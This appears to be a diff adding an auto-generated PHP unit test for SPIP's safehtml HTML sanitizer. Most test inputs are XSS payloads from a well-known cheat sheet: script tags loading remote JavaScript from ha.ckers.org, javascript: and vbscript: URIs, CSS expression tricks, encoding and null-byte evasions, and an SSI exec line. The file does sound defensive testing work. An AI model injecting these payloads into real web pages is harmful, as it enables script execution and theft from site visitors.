+<?php
+/**
+ * Test unitaire de la fonction safehtml
+ * du fichier ./inc/texte_mini.php
+ *
+ * genere automatiquement par TestBuilder
+ * le 2021-05-07 17:43
+ */
+
+ $test = 'safehtml';
+ $remonte = "../";
+ while (!is_dir($remonte."ecrire"))
+ $remonte = "../$remonte";
+ require $remonte.'tests/test.inc';
+ find_in_path("./inc/texte_mini.php",'',true);
+
+ // chercher la fonction si elle n'existe pas
+ if (!function_exists($f='safehtml')){
+ find_in_path("inc/filtres.php",'',true);
+ $f = chercher_filtre($f);
+ }
+
+ //
+ // hop ! on y va
+ //
+ $err = tester_fun($f, essais_safehtml());
+
+ // si le tableau $err est pas vide ca va pas
+ if ($err) {
+ die ('<dl>' . join('', $err) . '</dl>');
+ }
+
+ echo "OK";
+
+
+ function essais_safehtml(){
+ $essais = array (
+ 0 =>
+ array (
+ 0 => '',
+ 1 => '',
+ ),
+ 1 =>
+ array (
+ 0 => '0',
+ 1 => '0',
+ ),
+ 2 =>
+ array (
+ 0 => 'Un texte avec des <a href="http://spip.net">liens</a> [Article 1->art1] [spip->https://www.spip.net] https://www.spip.net',
+ 1 => 'Un texte avec des <a href="http://spip.net">liens</a> [Article 1->art1] [spip->https://www.spip.net] https://www.spip.net',
+ ),
+ 3 =>
+ array (
+ 0 => 'Un texte avec des entités &<>"',
+ 1 => 'Un texte avec des entités &<>"',
+ ),
+ 4 =>
+ array (
+ 0 => 'Un texte avec des entit&eacute;s echap&eacute; &amp;&lt;&gt;&quot;',
+ 1 => 'Un texte avec des entit&eacute;s echap&eacute; &amp;&lt;&gt;&quot;',
+ ),
+ 5 =>
+ array (
+ 0 => 'Un texte avec des entités numériques &<>"',
+ 1 => 'Un texte avec des entités numériques &<>"',
+ ),
+ 6 =>
+ array (
+ 0 => 'Un texte avec des entit&#233;s num&#233;riques echap&#233;es &#38;&#60;&#62;&quot;',
+ 1 => 'Un texte avec des entit&#233;s num&#233;riques echap&#233;es &#38;&#60;&#62;&quot;',
+ ),
+ 7 =>
+ array (
+ 0 => 'Un texte sans entites &<>"\'',
+ 1 => 'Un texte sans entites &<>"\'',
+ ),
+ 8 =>
+ array (
+ 0 => '{{{Des raccourcis}}} {italique} {{gras}} <code>du code</code>',
+ 1 => '{{{Des raccourcis}}} {italique} {{gras}} <code>du code</code>',
+ ),
+ 9 =>
+ array (
+ 0 => 'Un modele https://www.spip.net]>',
+ 1 => 'Un modele <modeleinexistant|lien=[->https://www.spip.net]>',
+ ),
+ 10 =>
+ array (
+ 0 => 'Un texte avec des retour
+a la ligne et meme des
+
+paragraphes',
+ 1 => 'Un texte avec des retour
+a la ligne et meme des
+
+paragraphes',
+ ),
+ 11 =>
+ array (
+ 0 => '\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//-->">\'><code class="echappe-js"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code>=&{}',
+ 1 => '\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}',
+ ),
+ 12 =>
+ array (
+ 0 => '\'\';!--"<xss>=&{()}</xss>',
+ 1 => '\'\';!--"<XSS>=&{()}',
+ ),
+ 13 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT>alert(\'XSS\')</SCRIPT></code>',
+ 1 => '<SCRIPT>alert(\'XSS\')</SCRIPT>',
+ ),
+ 14 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></code>',
+ 1 => '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>',
+ ),
+ 15 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code>',
+ 1 => '<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>',
+ ),
+ 16 =>
+ array (
+ 0 => '<base HREF="javascript:alert(\'XSS\');//">',
+ 1 => '<BASE HREF="javascript:alert(\'XSS\');//">',
+ ),
+ 17 =>
+ array (
+ 0 => '<code class="echappe-js"><BGSOUND SRC="javascript:alert(\'XSS\');"></code>',
+ 1 => '<BGSOUND SRC="javascript:alert(\'XSS\');">',
+ ),
+ 18 =>
+ array (
+ 0 => '<code class="echappe-js"><BODY BACKGROUND="javascript:alert(\'XSS\');"></code>',
+ 1 => '<BODY BACKGROUND="javascript:alert(\'XSS\');">',
+ ),
+ 19 =>
+ array (
+ 0 => '<code class="echappe-js"><BODY ONLOAD=alert(\'XSS\')></code>',
+ 1 => '<BODY ONLOAD=alert(\'XSS\')>',
+ ),
+ 20 =>
+ array (
+ 0 => '<div></div>',
+ 1 => '<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">',
+ ),
+ 21 =>
+ array (
+ 0 => '<div></div>',
+ 1 => '<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">',
+ ),
+ 22 =>
+ array (
+ 0 => '<div></div>',
+ 1 => '<DIV STYLE="width: expression(alert(\'XSS\'));">',
+ ),
+ 23 =>
+ array (
+ 0 => '',
+ 1 => '<FRAMESET><FRAME SRC="javascript:alert(\'XSS\');"></FRAMESET>',
+ ),
+ 24 =>
+ array (
+ 0 => '<code class="echappe-js"><IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME></code>',
+ 1 => '<IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME>',
+ ),
+ 25 =>
+ array (
+ 0 => '<input type="IMAGE" />',
+ 1 => '<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">',
+ ),
+ 26 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC="javascript:alert(\'XSS\');"></code>',
+ 1 => '<IMG SRC="javascript:alert(\'XSS\');">',
+ ),
+ 27 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC=javascript:alert(\'XSS\')></code>',
+ 1 => '<IMG SRC=javascript:alert(\'XSS\')>',
+ ),
+ 28 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG DYNSRC="javascript:alert(\'XSS\');"></code>',
+ 1 => '<IMG DYNSRC="javascript:alert(\'XSS\');">',
+ ),
+ 29 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG LOWSRC="javascript:alert(\'XSS\');"></code>',
+ 1 => '<IMG LOWSRC="javascript:alert(\'XSS\');">',
+ ),
+ 30 =>
+ array (
+ 0 => '<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" />',
+ 1 => '<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">',
+ ),
+ 31 =>
+ array (
+ 0 => 'exp/*<xss style="noxss:noxss("*/pression(alert("XSS"))"></xss>',
+ 1 => 'exp/*<XSS STYLE=\'no\\xss:noxss("*//*");
+xss:ex/*XSS*//*/*/pression(alert("XSS"))\'>',
+ ),
+ 32 =>
+ array (
+ 0 => '<ul><li>XSS</li></ul>',
+ 1 => '<STYLE>li {list-style-image: url("javascript:alert(\'XSS\')");}</STYLE><UL><LI>XSS',
+ ),
+ 33 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC=\'vbscript:msgbox("XSS")\'></code>',
+ 1 => '<IMG SRC=\'vbscript:msgbox("XSS")\'>',
+ ),
+ 34 =>
+ array (
+ 0 => '',
+ 1 => '<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>',
+ ),
+ 35 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC="livescript:[code]"></code>',
+ 1 => '<IMG SRC="livescript:[code]">',
+ ),
+ 36 =>
+ array (
+ 0 => '¼script¾alert(¢XSS¢)¼/script¾',
+ 1 => '¼script¾alert(¢XSS¢)¼/script¾',
+ ),
+ 37 =>
+ array (
+ 0 => '<code class="echappe-js"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');"></code>',
+ 1 => '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');">',
+ ),
+ 38 =>
+ array (
+ 0 => '<code class="echappe-js"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code>',
+ 1 => '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">',
+ ),
+ 39 =>
+ array (
+ 0 => '<code class="echappe-js"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'XSS\');"></code>',
+ 1 => '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'XSS\');">',
+ ),
+ 40 =>
+ array (
+ 0 => '<img />',
+ 1 => '<IMG SRC="mocha:[code]">',
+ ),
+ 41 =>
+ array (
+ 0 => '',
+ 1 => '<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>',
+ ),
+ 42 =>
+ array (
+ 0 => '<code class="echappe-js"><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(\'XSS\')></OBJECT></code>',
+ 1 => '<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(\'XSS\')></OBJECT>',
+ ),
+ 43 =>
+ array (
+ 0 => '',
+ 1 => '<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>',
+ ),
+ 44 =>
+ array (
+ 0 => '',
+ 1 => '<STYLE TYPE="text/javascript">alert(\'XSS\');</STYLE>',
+ ),
+ 45 =>
+ array (
+ 0 => '<img />',
+ 1 => '<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))">',
+ ),
+ 46 =>
+ array (
+ 0 => '<xss></xss>',
+ 1 => '<XSS STYLE="xss:expression(alert(\'XSS\'))">',
+ ),
+ 47 =>
+ array (
+ 0 => '<a class="XSS"></a>',
+ 1 => '<STYLE>.XSS{background-image:url("javascript:alert(\'XSS\')");}</STYLE><A CLASS=XSS></A>',
+ ),
+ 48 =>
+ array (
+ 0 => '',
+ 1 => '<STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE>',
+ ),
+ 49 =>
+ array (
+ 0 => '',
+ 1 => '<LINK REL="stylesheet" HREF="javascript:alert(\'XSS\');">',
+ ),
+ 50 =>
+ array (
+ 0 => '',
+ 1 => '<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">',
+ ),
+ 51 =>
+ array (
+ 0 => '',
+ 1 => '<STYLE>@import\'http://ha.ckers.org/xss.css\';</STYLE>',
+ ),
+ 52 =>
+ array (
+ 0 => '',
+ 1 => '<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">',
+ ),
+ 53 =>
+ array (
+ 0 => '',
+ 1 => '<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>',
+ ),
+ 54 =>
+ array (
+ 0 => '<table></table>',
+ 1 => '<TABLE BACKGROUND="javascript:alert(\'XSS\')"></TABLE>',
+ ),
+ 55 =>
+ array (
+ 0 => '<table><td></td></table>',
+ 1 => '<TABLE><TD BACKGROUND="javascript:alert(\'XSS\')"></TD></TABLE>',
+ ),
+ 56 =>
+ array (
+ 0 => '
+<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
+XSS
+
+',
+ 1 => '<HTML xmlns:xss>
+<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
+<xss:xss>XSS</xss:xss>
+
+</HTML>',
+ ),
+ 57 =>
+ array (
+ 0 => '<span></span>',
+ 1 => '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(\'XSS\');">]]>
+
+</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>',
+ ),
+ 58 =>
+ array (
+ 0 => '
+
+<span></span>',
+ 1 => '<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(\'XSS\')"></B></I></XML>
+
+<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>',
+ ),
+ 59 =>
+ array (
+ 0 => '
+<span></span>',
+ 1 => '<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
+<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>',
+ ),
+ 60 =>
+ array (
+ 0 => '
+<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
+
+<?import namespace="t" implementation="#default#time2">
+<SCRIPT DEFER>alert(\'XSS\')</SCRIPT>"> ',
+ 1 => '<HTML><BODY>
+<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
+
+<?import namespace="t" implementation="#default#time2">
+<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert(\'XSS\')</SCRIPT>"> </BODY></HTML>',
+ ),
+ 61 =>
+ array (
+ 0 => '',
+ 1 => '<!--[if gte IE 4]>
+<SCRIPT>alert(\'XSS\');</SCRIPT>
+<![endif]-->',
+ ),
+ 62 =>
+ array (
+ 0 => '<SCRIPT>alert(\'XSS\')</SCRIPT>">',
+ 1 => '<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'XSS\')</SCRIPT>">',
+ ),
+ 63 =>
+ array (
+ 0 => '<xss></xss>',
+ 1 => '<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">',
+ ),
+ 64 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></code>',
+ 1 => '<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>',
+ ),
+ 65 =>
+ array (
+ 0 => '',
+ 1 => '<!--#exec cmd="/bin/echo \'<SCRIPT SRC\'"--><!--#exec cmd="/bin/echo \'=http://ha.ckers.org/xss.js></SCRIPT>\'"-->',
+ ),
+ 66 =>
+ array (
+ 0 => '<? echo(\'alert("XSS")\'); ?>',
+ 1 => '<? echo(\'<SCR)\';
+echo(\'IPT>alert("XSS")</SCRIPT>\'); ?>',
+ ),
+ 67 =>
+ array (
+ 0 => '<br size="&{alert(\'XSS\')}" />',
+ 1 => '<BR SIZE="&{alert(\'XSS\')}">',
+ ),
+ 68 =>
+ array (
+ 0 => '<
+%3C
+<
+<
+<
+<
+<
+<
+<
+
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+
+<
+<
+<
+<
+<
+<
+\\x3c
+\\x3C
+\\u003c
+\\u003C',
+ 1 => '<
+%3C
+<
+<
+<
+<
+<
+<
+<
+
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+<
+
+<
+<
+<
+<
+<
+<
+\\x3c
+\\x3C
+\\u003c
+\\u003C',
+ ),
+ 69 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC=JaVaScRiPt:alert(\'XSS\')></code>',
+ 1 => '<IMG SRC=JaVaScRiPt:alert(\'XSS\')>',
+ ),
+ 70 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC=javascript:alert(&quot;XSS&quot;)></code>',
+ 1 => '<IMG SRC=javascript:alert("XSS")>',
+ ),
+ 71 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC=`javascript:alert("RSnake says, \'XSS\'")`></code>',
+ 1 => '<IMG SRC=`javascript:alert("RSnake says, \'XSS\'")`>',
+ ),
+ 72 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code>',
+ 1 => '<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>',
+ ),
+ 73 =>
+ array (
+ 0 => '<img />',
+ 1 => '<IMG SRC=javascript:alert('XSS')>',
+ ),
+ 74 =>
+ array (
+ 0 => '<img />',
+ 1 => '<IMG SRC=javascript:alert('XSS')>',
+ ),
+ 75 =>
+ array (
+ 0 => '<div style="background-image:00750072006C0028\'006a006100760061007300630072006900700074003a0061006c0065007200740028.10270058.1053005300270029\'0029"></div>',
+ 1 => '<DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">',
+ ),
+ 76 =>
+ array (
+ 0 => '<img />',
+ 1 => '<IMG SRC=javascript:alert('XSS')>',
+ ),
+ 77 =>
+ array (
+ 0 => ' ',
+ 1 => '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'XSS\');+ADw-/SCRIPT+AD4-',
+ ),
+ 78 =>
+ array (
+ 0 => '\\";alert(\'XSS\');//',
+ 1 => '\\";alert(\'XSS\');//',
+ ),
+ 79 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT>alert("XSS");</SCRIPT></code>',
+ 1 => '</TITLE><SCRIPT>alert("XSS");</SCRIPT>',
+ ),
+ 80 =>
+ array (
+ 0 => '',
+ 1 => '<STYLE>@im\\port\'\\ja\\vasc\\ript:alert("XSS")\';</STYLE>',
+ ),
+ 81 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC="jav ascript:alert(\'XSS\');"></code>',
+ 1 => '<IMG SRC="jav ascript:alert(\'XSS\');">',
+ ),
+ 82 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC="jav&#x09;ascript:alert(\'XSS\');"></code>',
+ 1 => '<IMG SRC="jav	ascript:alert(\'XSS\');">',
+ ),
+ 83 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC="jav&#x0A;ascript:alert(\'XSS\');"></code>',
+ 1 => '<IMG SRC="jav
ascript:alert(\'XSS\');">',
+ ),
+ 84 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC="jav&#x0D;ascript:alert(\'XSS\');"></code>',
+ 1 => '<IMG SRC="jav
ascript:alert(\'XSS\');">',
+ ),
+ 85 =>
+ array (
+ 0 => '<img />\r',
+ 1 => '<IMG\rSRC\r=\r"\rj\ra\rv\ra\rs\rc\rr\ri\rp\rt\r:\ra\rl\re\rr\rt\r(\r\'\rX\rS\rS\r\'\r)\r"\r>\r',
+ ),
+ 86 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC=java' . "\0" . 'script:alert("XSS")></code>',
+ 1 => '<IMG SRC=java' . "\0" . 'script:alert("XSS")>',
+ ),
+ 87 =>
+ array (
+ 0 => '&alert("XSS")',
+ 1 => '&<SCR' . "\0" . 'IPT>alert("XSS")</SCR' . "\0" . 'IPT>',
+ ),
+ 88 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC=" &#14; javascript:alert(\'XSS\');"></code>',
+ 1 => '<IMG SRC="  javascript:alert(\'XSS\');">',
+ ),
+ 89 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
+ 1 => '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
+ ),
+ 90 =>
+ array (
+ 0 => '|\\]^`=alert("XSS")>',
+ 1 => '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>',
+ ),
+ 91 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT SRC=http://ha.ckers.org/xss.js</code>',
+ 1 => '<SCRIPT SRC=http://ha.ckers.org/xss.js',
+ ),
+ 92 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT SRC=//ha.ckers.org/.j></code>',
+ 1 => '<SCRIPT SRC=//ha.ckers.org/.j>',
+ ),
+ 93 =>
+ array (
+ 0 => '<code class="echappe-js"><IMG SRC="javascript:alert(\'XSS\')"</code>',
+ 1 => '<IMG SRC="javascript:alert(\'XSS\')"',
+ ),
+ 94 =>
+ array (
+ 0 => '',
+ 1 => '<IFRAME SRC=http://ha.ckers.org/scriptlet.html <',
+ ),
+ 95 =>
+ array (
+ 0 => '<<code class="echappe-js"><SCRIPT>alert("XSS");//<</SCRIPT></code>',
+ 1 => '<<SCRIPT>alert("XSS");//<</SCRIPT>',
+ ),
+ 96 =>
+ array (
+ 0 => '<img /><code class="echappe-js"><SCRIPT>alert("XSS")</SCRIPT></code>">',
+ 1 => '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">',
+ ),
+ 97 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT>a=/XSS/<br />
+alert(a.source)</SCRIPT></code>',
+ 1 => '<SCRIPT>a=/XSS/
+alert(a.source)</SCRIPT>',
+ ),
+ 98 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
+ 1 => '<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
+ ),
+ 99 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
+ 1 => '<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
+ ),
+ 100 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT a="blah" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
+ 1 => '<SCRIPT a="blah" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
+ ),
+ 101 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
+ 1 => '<SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
+ ),
+ 102 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
+ 1 => '<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
+ ),
+ 103 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT>document.write("<SCRI");</SCRIPT></code>PT SRC="http://ha.ckers.org/xss.js">',
+ 1 => '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
+ ),
+ 104 =>
+ array (
+ 0 => '<code class="echappe-js"><SCRIPT a=">\'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
+ 1 => '<SCRIPT a=">\'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
+ ),
+ 105 =>
+ array (
+ 0 => '<a href="http://66.102.7.147/">XSS</a>',
+ 1 => '<A HREF="http://66.102.7.147/">XSS</A>',
+ ),
+ 106 =>
+ array (
+ 0 => '<a href="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</a>',
+ 1 => '<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>',
+ ),
+ 107 =>
+ array (
+ 0 => '<a href="http://1113982867/">XSS</a>',
+ 1 => '<A HREF="http://1113982867/">XSS</A>',
+ ),
+ 108 =>
+ array (
+ 0 => '<a href="http://0x42.0x0000066.0x7.0x93/">XSS</a>',
+ 1 => '<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>',
+ ),
+ 109 =>
+ array (
+ 0 => '<a href="http://0102.0146.0007.00000223/">XSS</a>',
+ 1 => '<A HREF="http://0102.0146.0007.00000223/">XSS</A>',
+ ),
+ 110 =>
+ array (
+ 0 => '<a>XSS</a>',
+ 1 => '<A HREF="h
+tt p://6	6.000146.0x7.147/">XSS</A>',
+ ),
+ 111 =>
+ array (
+ 0 => '<a href="//www.google.com/">XSS</a>',
+ 1 => '<A HREF="//www.google.com/">XSS</A>',
+ ),
+ 112 =>
+ array (
+ 0 => '<a href="//google">XSS</a>',
+ 1 => '<A HREF="//google">XSS</A>',
+ ),
+ 113 =>
+ array (
+ 0 => '<a href="http://ha.ckers.org@google">XSS</a>',
+ 1 => '<A HREF="http://ha.ckers.org@google">XSS</A>',
+ ),
+ 114 =>
+ array (
+ 0 => '<a href="http://google:ha.ckers.org">XSS</a>',
+ 1 => '<A HREF="http://google:ha.ckers.org">XSS</A>',
+ ),
+ 115 =>
+ array (
+ 0 => '<a href="http://google.com/">XSS</a>',
+ 1 => '<A HREF="http://google.com/">XSS</A>',
+ ),
+ 116 =>
+ array (
+ 0 => '<a href="http://www.google.com./">XSS</a>',
+ 1 => '<A HREF="http://www.google.com./">XSS</A>',
+ ),
+ 117 =>
+ array (
+ 0 => '<a>XSS</a>',
+ 1 => '<A HREF="javascript:document.location=\'http://www.google.com/\'">XSS</A>',
+ ),
+ 118 =>
+ array (
+ 0 => '<a href="http://www.gohttp://www.google.com/ogle.com/">XSS</a>',
+ 1 => '<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>',
+ ),
+ 119 =>
+ array (
+ 0 => '<span class="montant" data-montant-nombre="100" data-montant-devise="EUR"></span>',
+ 1 => '<span class="montant" data-montant-nombre="100" data-montant-devise="EUR">',
+ ),
+);
+ return $essais;
+ }
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+